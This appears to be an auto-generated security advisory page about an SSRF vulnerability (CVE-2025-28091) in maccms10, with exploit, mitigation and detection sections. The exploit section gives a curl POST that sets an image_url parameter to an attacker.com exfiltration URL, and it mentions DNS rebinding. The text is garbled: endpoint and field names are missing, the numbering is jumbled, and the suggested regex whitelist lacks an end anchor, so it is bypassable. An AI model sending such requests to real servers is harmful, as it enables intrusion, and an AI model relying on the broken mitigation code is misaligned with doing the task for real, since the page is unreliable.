maccms10, Server-Side Request Forgery (SSRF), CVE-2025-28091 (Critical)

By /

Listen to this Post

How the CVE Works:

CVE-2025-28091 exploits a Server-Side Request Forgery (SSRF) vulnerability in maccms10 v2025.1000.4047. The flaw exists in the “Add ” functionality, where improper input validation allows attackers to craft malicious requests. By injecting manipulated URLs, an attacker can force the server to make unauthorized internal or external HTTP requests. This could lead to data exfiltration, internal network scanning, or abuse of trust relationships. The vulnerability stems from insufficient sanitization of user-supplied input in backend HTTP request handlers, enabling attackers to bypass access controls and interact with restricted systems.

DailyCVE Form:

Platform: maccms10
Version: v2025.1000.4047
Vulnerability: SSRF
Severity: Critical
Date: 04/07/2025

What Undercode Say:

Exploit:

  1. Craft a malicious POST request to `/admin//add` with a manipulated `image_url` parameter: 
    curl -X POST "http://target.com/admin//add" -d "=test&image_url=http://attacker.com/exfil"
  2. Use Burp Suite to intercept and modify legitimate requests, replacing URLs with internal endpoints (e.g., `http://localhost/admin`).

    3. Leverage DNS rebinding to bypass IP restrictions.

    Mitigation:

    1. Patch to maccms10 v2025.1000.4050 or later.

  3. Implement input validation using regex to whitelist allowed domains: 
    if (!preg_match('/^(https?:\/\/)(example.com|trusted.org)/', $url)) {
die("Invalid URL");
}

    3. Disable unnecessary URL schemes (e.g., file://, gopher://).

  4. Enforce network segmentation to restrict server outbound traffic.

Detection:

  1. Monitor logs for unusual outbound requests to unknown domains. 
    grep "GET /admin//add" /var/log/nginx/access.log | awk '{print $7}'

2. Use WAF rules to block SSRF patterns:

location /admin {
if ($args ~ "image_url=http://internal") {
return 403;
}
}

Analytics:

  • CVSS 4.0: 9.6 (AV:N/AC:L/AT:N/PR:N/UI:N/S:C/C:H/I:H/A:H)
  • Exploitability: High (PoC publicly available).
  • Affected Systems: All maccms10 instances prior to v2025.1000.4050.

References:

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28091
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top